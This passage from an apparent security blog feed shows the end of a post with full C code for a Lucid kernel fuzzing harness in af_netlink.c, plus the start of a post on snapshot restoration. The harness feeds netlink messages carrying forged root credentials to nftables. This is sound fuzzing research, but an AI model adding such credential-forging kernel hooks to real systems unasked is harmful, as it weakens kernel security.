<span class="n">envelope</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;I'</span><span class="p">,</span> <span class="n">envelope_len</span><span class="p">)</span> <span class="o">+</span> <span class="n">all_bytes</span>

<span class="c1"># Now wrap that in an lf_input
</span><span class="n">num_envs</span> <span class="o">=</span> <span class="mi">1</span>
<span class="n">total_len</span> <span class="o">=</span> <span class="mi">8</span> <span class="c1"># Metadata for lf_input
</span><span class="n">total_len</span> <span class="o">+=</span> <span class="nb">len</span><span class="p">(</span><span class="n">envelope</span><span class="p">)</span>
<span class="n">lf_input</span> <span class="o">=</span> <span class="n">struct</span><span class="p">.</span><span class="n">pack</span><span class="p">(</span><span class="s">'&lt;II'</span><span class="p">,</span> <span class="n">total_len</span><span class="p">,</span> <span class="n">num_envs</span><span class="p">)</span> <span class="o">+</span> <span class="n">envelope</span>

<span class="c1"># Write that to stdout
</span><span class="n">sys</span><span class="p">.</span><span class="n">stdout</span><span class="p">.</span><span class="nb">buffer</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">lf_input</span><span class="p">)</span>
</code></pre></div></div>

<p>We can now pipe that to <code class="language-plaintext highlighter-rouge">base64</code> and then pipe that to the harness for testing:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">[devbox:~/nft_fuzzing]$</span><span class="w"> </span>python3 wrapper.py | <span class="nb">base64</span>
<span class="go">XAAAAAEAAABQAAAAFAAAABAAAQAAAAAAAAAAAAAACgAoAAAAAAoBAAEAAAAAAAAAAQAAAAkAAQBmdXp6AAAAAAgAAgAAAAAAFAAAABEAAQACAAAAAAAAAAAACgA=
</span></code></pre></div></div>

<p>Then when we run <code class="language-plaintext highlighter-rouge">echo "&lt;base64&gt;" | harness</code> on the <code class="language-plaintext highlighter-rouge">qemu-system</code> running our custom kernel, we get the following kernel logs:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   23.347957] Inside lucid fuzz!
[   23.349015] Calling lucid_fuzz_init...
[   23.350233] Hello from lucid_fuzz_init
[   23.351399] LF_MAX_INPUT_LEN is: 196712
[   23.355266] Hello from lucid_fuzz_handle_input
[   23.359789] Calling lucid_fuzz_cleanup...
lucid_fuzz returned 0
</span></code></pre></div></div>

<p>So the harness works!</p>

<h2 id="conclusion">Conclusion</h2>
<p>Hopefully this helps you understand how to write a harness for Lucid. We needed to:</p>
<ol>
  <li>identify a way to inject raw input bytes into kernel memory</li>
  <li>take a snapshot with our special NOP instruction</li>
  <li>implement a custom protocol that our harness can understand so that it can parse the raw input bytes into something that can be sent to the target</li>
  <li>reset the snapshot with our special NOP instruction</li>
  <li>cleanup all the resources in the harness so we can use it for debugging as well.</li>
</ol>

<p>I’ve pasted the full harness code that I added in <code class="language-plaintext highlighter-rouge">af_netlink.c</code> below, cheers:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*************** Start of Lucid Fuzzing Harness *****************************/</span>
<span class="cp">#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input-&gt;total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope-&gt;len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)
</span>
<span class="c1">// Used by Lucid when scanning for where to inject the input </span>
<span class="cp">#define LUCID_SIGNATURE { 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, 0x13, 0x37, \
                          0x13, 0x38, 0x13, 0x38, 0x13, 0x38, 0x13, 0x38 }
</span>
<span class="c1">// Structure that describes an input as Lucid sees it</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
	<span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">input</span><span class="p">[</span><span class="n">LF_MAX_INPUT_LEN</span><span class="p">];</span>
<span class="p">};</span>

<span class="c1">// Create instance of the struct</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="n">fc</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">}</span>	<span class="cm">/* Where Lucid injects an input */</span>
<span class="p">};</span>

<span class="c1">// The function pointer we send the skbs to, the netlink rcv handler for</span>
<span class="c1">// netfilter nfnetlink_rcv</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// The kernel-registered socket waiting for input from us</span>
<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Pool of skbs we use to store data in envelopes</span>
<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skbs</span><span class="p">[</span><span class="n">LF_MAX_NUM_ENVS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> 

<span class="c1">// Our initialization function, called before we do any fuzzing</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_init</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"LF_MAX_INPUT_LEN is: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">);</span>

	<span class="c1">// Copy the user data over to the fuzzcase instance if there is any</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span>
			<span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span>
		<span class="p">))</span>
		<span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Doing this how other kernel code does it, lock the global table</span>
	<span class="n">netlink_table_grab</span><span class="p">();</span>

	<span class="c1">// Pre-set the err as if we failed to find the handler for NETFILTER</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="c1">// Check to see if the handler is registered</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nl_table</span><span class="p">[</span><span class="n">NETLINK_NETFILTER</span><span class="p">].</span><span class="n">registered</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab the kernel socket</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="n">netlink_lookup</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kern_sock</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab that .input handler</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="n">nlk_sk</span><span class="p">(</span><span class="n">kern_sock</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">netlink_rcv</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">handler</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Ungrab the table we're done with it</span>
	<span class="n">netlink_table_ungrab</span><span class="p">();</span>

	<span class="c1">// Pre-set</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="c1">// Create all of the socket buffers we need and store them</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="n">LF_MAX_ENV_LEN</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
		<span class="c1">// If we failed, unroll all the previous allocations</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">while</span> <span class="p">(</span><span class="o">--</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
				<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="c1">// Initialize what we need to look legit</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">pkt_type</span> <span class="o">=</span> <span class="n">PACKET_HOST</span><span class="p">;</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">dst_group</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_UID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_GID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">flags</span> <span class="o">=</span> <span class="n">NETLINK_SKB_DST</span><span class="p">;</span>

		<span class="c1">// Store the skb</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">skb</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// We are so done dude, it worked</span>
	<span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Define our input structures</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="c1">// Creates a socket buffer filled with fuzz message</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="nf">create_fuzz_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span><span class="p">,</span> <span class="kt">int</span> <span class="n">idx</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Sanity check</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">idx</span> <span class="o">&gt;=</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">)</span>
		<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Grab socket buffer from global buf</span>
	<span class="n">skb</span> <span class="o">=</span> <span class="n">skbs</span><span class="p">[</span><span class="n">idx</span><span class="p">];</span>

	<span class="c1">// Set the socket buffer's sock to the kernel sock for Netfilter</span>
	<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>

	<span class="c1">// Inject fuzz data and set sizes</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">skb_put</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">),</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

	<span class="k">return</span> <span class="n">skb</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Dispatches the skb to the appropriate netlink recv handler</span>
<span class="k">static</span> <span class="kt">void</span> <span class="nf">dispatch_skb</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
	<span class="c1">// Create function pointer, msg-&gt;protocol already sane</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">)</span> <span class="o">=</span> <span class="n">handler</span><span class="p">;</span>

	<span class="c1">// Dispatch!</span>
	<span class="n">rcv</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Main input processing logic</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">input</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_handle_input</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

	<span class="cm">/** LUCID TAKES SNAPSHOT HERE **/</span>
	<span class="c1">// This special NOP instruction, when interpreted by Bochs will cause</span>
	<span class="c1">// Bochs to save a snapshot of its state to disk that Lucid will be able</span>
	<span class="c1">// to resume in its purposbe built version of Bochs called `lucid_bochs`</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %dx, %dx"</span><span class="p">);</span>

	<span class="c1">// Make sure we enough bytes to construct the input metadata</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">&lt;</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span><span class="p">))</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Cast the data to our metadata struct</span>
	<span class="n">input</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="p">)</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">;</span>

	<span class="c1">// Sanity check the values</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">!=</span> <span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Sanity check the number of messages</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">&gt;</span> <span class="n">LF_MAX_NUM_ENVS</span> <span class="o">||</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="c1">// Check how many remaining bytes we have, and subtract what we already</span>
	<span class="c1">// consumed with the input metadata</span>
	<span class="n">remaining</span> <span class="o">=</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">total_len</span><span class="p">;</span>
	<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Start tracking an offset into the byte buffer where we're reading from</span>
	<span class="n">offset</span> <span class="o">=</span> <span class="n">LF_INPUT_HDR_SIZE</span><span class="p">;</span>

	<span class="c1">// Iterate through the envelopes and parse each one</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">input</span><span class="o">-&gt;</span><span class="n">num_envs</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="c1">// Make sure we have enough data remaining to parse an envelope metadata</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We can at least read the length field, and sanity check it</span>
		<span class="n">env</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="p">)(</span><span class="n">fc</span><span class="p">.</span><span class="n">input</span> <span class="o">+</span> <span class="n">offset</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">&gt;</span> <span class="n">LF_MAX_ENV_LEN</span> <span class="o">||</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Consume those bytes</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">LF_ENV_HDR_SIZE</span><span class="p">;</span>

		<span class="c1">// Make sure we can read that much data</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span> <span class="o">&lt;</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// We have enough data left, create the skb for this envelope</span>
		<span class="n">fuzz_skb</span> <span class="o">=</span> <span class="n">create_fuzz_skb</span><span class="p">(</span><span class="n">env</span><span class="p">,</span> <span class="n">i</span><span class="p">);</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">fuzz_skb</span><span class="p">)</span>
			<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

		<span class="c1">// Dispatch the fuzz_skb to nftables!</span>
		<span class="n">dispatch_skb</span><span class="p">(</span><span class="n">fuzz_skb</span><span class="p">);</span>

		<span class="c1">// Update our offset</span>
		<span class="n">offset</span> <span class="o">+=</span> <span class="p">(</span><span class="n">LF_ENV_HDR_SIZE</span> <span class="o">+</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">);</span>

		<span class="c1">// Update remaining</span>
		<span class="n">remaining</span> <span class="o">-=</span> <span class="n">env</span><span class="o">-&gt;</span><span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Done parsing envelopes, check if we have remaining bytes</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">remaining</span><span class="p">)</span>
		<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>

	<span class="cm">/** LUCID RESTORES SNAPSHOT **/</span>
	<span class="n">asm</span> <span class="k">volatile</span><span class="p">(</span><span class="s">"xchgw %bx, %bx"</span><span class="p">);</span>

	<span class="c1">// Finally done</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Cleanup resources from lf_init(), not used when fuzzing but good for harness</span>
<span class="c1">// dev/testing</span>
<span class="kt">void</span> <span class="nf">lucid_fuzz_cleanup</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// NULL the globals</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="c1">// Set input size to 0</span>
	<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Linux" /><category term="Kernel" /><category term="Nftables" /><summary type="html"><![CDATA[Background Last episode on the blog we took a shallow and broad approach to fuzzing several Netlink-plumbed subsystems like Netfilter, Route, Crypto, and Xfrm. This endeavor wasn’t necessarily an earnest bug finding mission since we mostly wanted to just see how fuzzing a real target with Lucid would go and what things would need tweaking. We ended up changing quite a bit of the core-fuzzer features, specifically Redqueen issues, and were able to improve the fuzzer quite a bit. We modularized the mutator component of Lucid so now writing your own fuzzer for Lucid is as simple as implementing your own mutator. We can extend this even more, and will, by enabling the user to pass command line arguments directly to the bespoke mutator.]]></summary></entry><entry><title type="html">Lucid Dreams I: Lucid’s First Time Fuzzing</title><link href="https://h0mbre.github.io/Lucid_Dreams_1/" rel="alternate" type="text/html" title="Lucid Dreams I: Lucid’s First Time Fuzzing" /><published>2025-10-04T00:00:00+00:00</published><updated>2025-10-04T00:00:00+00:00</updated><id>https://h0mbre.github.io/Lucid_Dreams_1</id><content type="html" xml:base="https://h0mbre.github.io/Lucid_Dreams_1/"><![CDATA[<h2 id="background">Background</h2>
<p>We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.</p>

<h2 id="off-blog-snapshot-dev">Off-Blog Snapshot Dev</h2>
<p>Since the last post, the biggest change has been the way we do snapshots. I found that on the simple development target, a really tight fuzzing loop, the scaling factor for the old snapshot method deteriorated quickly.</p>

<h3 id="old-snapshot-method-revisited">Old Snapshot Method Revisited</h3>
<p>If you remember, the fuzzer works by loading a <code class="language-plaintext highlighter-rouge">static-pie</code> ELF image of the Bochs x86 emulator into the fuzzer process and context switching between the now sand-boxed emulator that runs our target and our fuzzer which does all the fuzzy things. Because we load and sand-box Bochs, we know the location of every memory segment in the image that is writable, as well as where the dynamic memory is because we don’t allow Bochs to interface with the OS to allocate memory, the fuzzer handles that. So what we did was map the writable memory segments such that they were all contiguous in memory. Then when we take a snapshot of Bochs, all we have to do is capture that memory state and save it off. We did that, and we saved the memory as a memory-backed file. On Linux, snapshot restoration then becomes very simple, we just <code class="language-plaintext highlighter-rouge">mmap</code> that memory backed file back over top the contiguous writable memory region. One single syscall to restore memory. We did this mainly because it was very simple. Well it turns out, when you ask the kernel to invalidate/destroy/and overwrite billions of bytes worth of pages thousands of times per second, it scales poorly. Embarrassed to admit that I don’t quite remember what the bottleneck was, but I seem to remember that the <code class="language-plaintext highlighter-rouge">mmap</code> requests seemed to need some sort of serialization and were spending most of their CPU time destroying the dirtied memory backing pages. My scaling factor went into the toilet once I brought up the 8 cores I have on my devbox. So I had to find another way to do this, likely one that didn’t depend on restoring <em>all</em> writable memory each iteration, but differentially resetting only dirty memory in Bochs.</p>

<h3 id="new-strategy-for-linear-scaling">New Strategy for Linear Scaling</h3>
<p>We want to be able to scale Lucid linearly as we bring more cores online for fuzzing, so we want our scaling factor to be one-to-one with the amount of cores being used. 100 cores should bring us a 100x speed-up over single-core fuzzing. So we need a way to differentially restore only the dirty memory and not all writable memory. We also want to strive for a method that doesn’t invoke the kernel via syscall, because that’s how you bottleneck across cores. The way I decided to do this is not novel and I didn’t invent this method, it’s actually similar to the way a lot of fuzzers get coverage feedback on black-box targets.</p>

<p>What I ended up doing is marking all of the writable pages that we load for Bochs as having no write permissions (strictly <code class="language-plaintext highlighter-rouge">PROT_READ</code>). This way, when Bochs tries to write to a page, it will cause a page-fault. On Linux, your process gets a signal delivered whenever this happens and you can invoke a function to handle signals. So I patched Bochs to handle these page faults and in the signal handler function Bochs marks the faulting address as a dirty page in a data structure that both Bochs and Lucid have access to. So now, we’ve logged a page that was dirtied and we then make that page permanently writable and we restore that page on snapshot reset every time now. This design boils snapshot restoration down to a series of <code class="language-plaintext highlighter-rouge">memcpy</code> calls from the snapshot memory to the dirty memory. Now we’ve achieved differential restoration and everything is done purely in userspace via <code class="language-plaintext highlighter-rouge">memcpy</code>, no syscalls are invoked in the hot path to restore the snapshot. This seems to scale perfectly and we’re pretty close to the one-to-one scaling factor we’re after. The fuzzers spend 100% of their time in userland when they’re executing the hot fuzzing loops.</p>

<div class="language-text highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+----------------------------------------------+
| [1] Fuzzcase Begins                          |&lt;---------------+
| Lucid starts executing target code in Bochs. |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [2] Bochs Writes to Page                     |                |
| Attempted write -&gt; page is PROT_READ only.   |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [3] Page Fault Handler                       |                |
| Fault occurs -&gt; handler adds page to dirty   |                |
| list and sets protection to PROT_WRITE.      |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [4] Fuzzcase Ends                            |                |
| Execution completes                          |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [5] Snapshot Restore                         |                |
| Lucid iterates dirty list -&gt; memcpy snapshot |                |
| contents back into those pages.              |----------------+
| (No syscalls, all user-space.)               |
+----------------------------------------------+
</code></pre></div></div>

<h3 id="redqueen-for-compare-solving">Redqueen for Compare Solving</h3>
